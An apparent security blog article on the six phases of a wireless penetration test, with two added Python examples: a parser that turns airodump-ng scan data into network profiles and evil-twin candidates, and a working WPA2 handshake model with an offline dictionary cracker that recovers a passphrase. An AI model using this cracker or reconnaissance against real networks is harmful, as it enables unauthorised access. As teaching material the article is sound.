Wednesday, 28 July 2021 14:33

Phases of a Wireless Penetration Test

Wireless penetration tests are more complicated than just "hacking" into a network to find vulnerabilities. Penetration testers follow a step-by-step process to ensure they cover every corner of a company's wireless attack surface. This article describes those stages and takes a deeper look at each phase. To understand what a wireless penetration test is, see our other article, Wireless Penetration Testing: What You Need to Know.


Phase 1: Reconnaissance


This first phase involves gathering as much data as possible about the networks associated with the business. The penetration tester scouts the physical business premises to probe for:


  • All wireless networks related to the business
  • Wireless networks that business devices connect to
  • Any wireless networks that personal devices connect to
  • Other wireless networks in proximity that business or personal devices could connect to


Probing for these networks is not about getting in-depth intelligence; it is about getting broad coverage and compiling an outline of what is there. Much of the traffic observed will be encrypted, since most businesses run WPA2 (WPA3 is its successor but is not yet universally deployed). WPA2 protects the link with encryption and authenticates each client through an EAPOL-based 4-way handshake, backed either by a pre-shared key or by 802.1X.

The focus of this phase is to set up for the following stages. 


Phase 2: Identifying Networks


After collecting the broad list of wireless networks in the reconnaissance phase, it is time to scan them in depth.


Now the tester identifies and records the detailed data that separates each network from the others, building a portfolio for each network found. Distinct characteristics are obtained and used to organize them; some traits include:

  • Network names (SSIDs), the access points (BSSIDs) broadcasting them, and the client devices associated with each
  • Average traffic volume and usage patterns for each network and device
  • Channels, frequency bands, and the segments (for example guest versus corporate) within each network


This stage's collected data is vital in the following phase in identifying vulnerabilities on the access points. 
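As an added example (not part of the original article), the following Python script shows how the reconnaissance inventory and the Phase 2 portfolios can be assembled from a scan dump: it parses the dump, attaches the associated clients to each access point, separates the business's own networks from neighbouring ones, flags open and WEP networks, and lists the SSIDs that unassociated devices are still probing for (the networks personal devices remember). It assumes the dump is in the CSV layout written by airodump-ng, a tool the article does not name; every BSSID, SSID, MAC address and the scope list are constructed for the example, not taken from a real capture.

```python
import csv
from collections import defaultdict

# Constructed sample in airodump-ng's CSV layout; every address and SSID here is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2021-07-28 14:00:01, 2021-07-28 14:20:10,  6, 130, WPA2, CCMP, PSK, -41, 812, 0, 0. 0. 0. 0, 8, CorpWiFi,
00:11:22:33:44:56, 2021-07-28 14:00:01, 2021-07-28 14:20:10, 11,  54, OPN, , , -55, 790, 0, 0. 0. 0. 0, 10, Corp-Guest,
AA:BB:CC:DD:EE:01, 2021-07-28 14:02:30, 2021-07-28 14:19:58,  1,  54, WEP, WEP, , -70, 301, 1200, 0. 0. 0. 0, 9, Warehouse,
DE:AD:BE:EF:00:01, 2021-07-28 14:05:12, 2021-07-28 14:18:44,  6, 130, WPA2, CCMP, PSK, -80, 120, 0, 0. 0. 0. 0, 7, CafeNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2021-07-28 14:01:00, 2021-07-28 14:20:00, -50, 412, 00:11:22:33:44:55, CorpWiFi
66:77:88:99:AA:CC, 2021-07-28 14:03:00, 2021-07-28 14:19:00, -60, 88, 00:11:22:33:44:56,
66:77:88:99:AA:DD, 2021-07-28 14:04:00, 2021-07-28 14:18:00, -65, 12, (not associated), CorpWiFi,HomeNet-5G
"""

# Hypothetical scope: the ESSIDs the client has confirmed as its own.
IN_SCOPE_ESSIDS = {"CorpWiFi", "Corp-Guest", "Warehouse"}


def _split_sections(text):
    """airodump-ng writes an access-point table, a blank line, then a station table."""
    ap_lines, sta_lines = [], []
    target = ap_lines
    for line in text.splitlines():
        if line.startswith("Station MAC"):
            target = sta_lines
        if line.strip():
            target.append(line)
    return ap_lines, sta_lines


def parse_airodump_csv(text):
    """Return (access points, stations) as lists of dicts with whitespace-stripped fields."""
    ap_lines, sta_lines = _split_sections(text)
    ap_rows = list(csv.reader(ap_lines))
    header = [h.strip() for h in ap_rows[0]]
    aps = []
    for row in ap_rows[1:]:
        rec = dict(zip(header, (c.strip() for c in row)))
        aps.append({"bssid": rec["BSSID"], "essid": rec["ESSID"], "channel": int(rec["channel"]),
                    "privacy": rec["Privacy"], "cipher": rec["Cipher"], "auth": rec["Authentication"],
                    "power": int(rec["Power"])})
    stations = []
    for row in list(csv.reader(sta_lines))[1:]:
        cells = [c.strip() for c in row]
        # Probed ESSIDs are comma-separated, so they spill into every column after BSSID.
        stations.append({"mac": cells[0], "power": int(cells[3]), "bssid": cells[5],
                         "probes": [p for p in cells[6:] if p]})
    return aps, stations


def build_profiles(aps, stations):
    """Phase 2 portfolio: one record per BSSID with the clients associated to it."""
    profiles = {ap["bssid"]: dict(ap, clients=[]) for ap in aps}
    for sta in stations:
        if sta["bssid"] in profiles:
            profiles[sta["bssid"]]["clients"].append(sta["mac"])
    return profiles


def classify_by_scope(profiles, scope_essids):
    """Separate the business's networks from neighbouring ones."""
    ours = sorted(b for b, p in profiles.items() if p["essid"] in scope_essids)
    neighbours = sorted(b for b, p in profiles.items() if p["essid"] not in scope_essids)
    return ours, neighbours


def weak_networks(profiles):
    """BSSIDs whose link offers no usable protection: open or WEP."""
    return sorted(b for b, p in profiles.items() if p["privacy"] in ("OPN", "WEP"))


def probed_by_unassociated_clients(stations):
    """ESSIDs that roaming devices keep asking for; each is a candidate evil-twin name."""
    out = defaultdict(set)
    for sta in stations:
        if sta["bssid"] == "(not associated)":
            for essid in sta["probes"]:
                out[essid].add(sta["mac"])
    return {essid: sorted(macs) for essid, macs in out.items()}


def summarize(text=SAMPLE_CSV, scope=IN_SCOPE_ESSIDS):
    aps, stations = parse_airodump_csv(text)
    profiles = build_profiles(aps, stations)
    ours, neighbours = classify_by_scope(profiles, scope)
    return {"in_scope": ours, "neighbours": neighbours, "weak": weak_networks(profiles),
            "probed": probed_by_unassociated_clients(stations), "profiles": profiles}


if __name__ == "__main__":
    for key, value in summarize().items():
        print(key, value)
```

Note that the probe list is the part most often overlooked: a device asking for "HomeNet-5G" in the office tells the tester which names an evil twin would need to carry, and that is exactly the kind of personal-device exposure the first phase is meant to record.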


Phase 3: Vulnerability Research


The next phase of the pen-test focuses on zeroing in on weaknesses in the access points and the clients that use them. This phase is the final and most crucial planning step in the process. 


Even more detailed analysis is conducted on the wireless networks, seeking any exploitable faults. One weak link can compromise the entire network and result in complete control of the system. The most common weaknesses, and the attacks that target them, include:


  • Piggybacking
  • Wardriving
  • Evil Twin Attacks
  • Wireless Sniffing
  • Unauthorized Computer Access
  • Shoulder Surfing
  • Theft of Mobile Devices


For example, consider how a WPA2-Personal client joins an access point (AP). The pre-shared key is never transmitted. Instead, client and AP run a '4-way handshake' over EAPOL: each side contributes a random nonce, both derive the session keys from the pre-shared key and those nonces, and each proves it holds the key by attaching a message integrity code (MIC) to the handshake frames.

A malicious hacker can sniff those frames (forcing a client offline with a deauthentication frame so that it reconnects and repeats the handshake, if no handshake is in progress) and then attempt to extract the password offline, testing candidate passphrases against the captured MIC until one matches. 
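Added example, not from the original article: a Python model of the handshake described above, showing why the passphrase is never on the wire and how a captured handshake is attacked offline. The SSID, MAC addresses, nonces, wordlist and passphrase are constructed; the frame is a minimal EAPOL-Key message 2 built only so the MIC check can be demonstrated, and the over-the-air part (sniffing, deauthentication) is not modelled.

```python
import hashlib
import hmac

# All values below are constructed for the example; none come from a real capture.
SSID = b"CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")     # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")    # supplicant address (SPA)
ANONCE = hashlib.sha256(b"example-anonce").digest()   # 32-byte nonce the AP sent in message 1
SNONCE = hashlib.sha256(b"example-snonce").digest()   # 32-byte nonce the client sent in message 2
TRUE_PASSPHRASE = "Corp-Wifi-2021"
MIC_OFFSET = 81   # byte offset of the 16-byte MIC field in an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf384(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, 2, first 48 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(3))
    return out[:48]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both addresses and both nonces; only the nonces ever cross the air."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf384(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): HMAC-SHA1 over the frame with the MIC zeroed, cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes, kck: bytes) -> bytes:
    """Construct a minimal handshake message 2 (client -> AP) carrying SNonce and a valid MIC."""
    header = bytes([0x02, 0x03]) + (95).to_bytes(2, "big")          # EAPOL v2, type Key, body length
    body = (bytes([0x02])                                           # descriptor type: RSN
            + bytes([0x01, 0x0a])                                   # key info: MIC set, pairwise, version 2
            + (16).to_bytes(2, "big")                               # key length (CCMP)
            + (1).to_bytes(8, "big")                                # replay counter
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8)             # key IV, key RSC, key ID
    frame = header + body + b"\x00" * 16 + (0).to_bytes(2, "big")   # MIC placeholder, key data length
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, aa, spa, anonce, snonce, captured_msg2, wordlist):
    """Offline dictionary attack: recompute the MIC for every guess; a match reveals the passphrase."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], captured_msg2), captured_mic):
            return guess
    return None


def demo():
    # What the sniffer would see: message 2 of a legitimate handshake.
    real_ptk = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    captured = build_message2(SNONCE, real_ptk[:16])
    wordlist = ["password", "CorpWiFi", "Corp-Wifi-2020", TRUE_PASSPHRASE, "letmein"]   # constructed
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Everything the attacker needs (SSID, both MAC addresses, both nonces, one MIC) is in the capture, so the only thing standing between the capture and the passphrase is the cost of 4096 PBKDF2 rounds per guess, which is why passphrase strength, not the handshake, is the control that matters for WPA2-Personal.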

The following stage will clarify how these vulnerabilities become exploitable.


Phase 4: Exploitation


We are now bringing the planning phases into an action phase. 


This stage is where the plan turns into an actual attack. Ethical hacking techniques are used with the intent of obtaining control of the client's cyber assets. The penetration tester attempts to breach the system as quickly as possible, go as deep into it as the scope allows, and exit, all without being detected. 


Typically this stage consists of a combination of the following:


  • Exploiting a vulnerability in a wireless connection to gain a foothold on the network
  • Doubling back and moving laterally to find further ways in
  • Following each path as far as it goes, to see how much control can be seized
  • Documenting the routes taken so they can be reproduced in later testing


After all identified exploits have been explored, or a limit agreed during scoping has been reached, this stage is complete. 


Phase 5: Reporting


Compiling the previous steps and their findings into an in-depth report is key to completing a penetration test. Although the format is straightforward, how it is executed is essential. The final report should contain the following sections:


  • Executive Summary
  • Detailed Technical Risks
  • Vulnerabilities Found
  • How you Found the Vulnerabilities
  • Successful Exploits
  • Mitigation Recommendations


After organizing all the data gathered, then the final phase can initiate.


Phase 6: Security Control Application


The client must be given a way to protect itself from the identified vulnerabilities, so the tester ends the engagement by turning the offensive findings into a defensive plan for the client. 


Every successful exploit and identified vulnerability becomes an item in a mitigation plan that the testing party develops on behalf of the client. The plan should include:

  • Security processes that close the gaps that were found
  • Techniques that add further layers of defense
  • Solutions that cover both short- and long-term fixes



We have discussed the six phases of a wireless pen test and the importance of each step. As the first diagram highlighted, only the last two stages are visible to the company after the test is complete; the four stages before them are what bring the company's network weaknesses to light and make an action plan against real-world risk possible. 



Last modified on Wednesday, 04 August 2021 20:24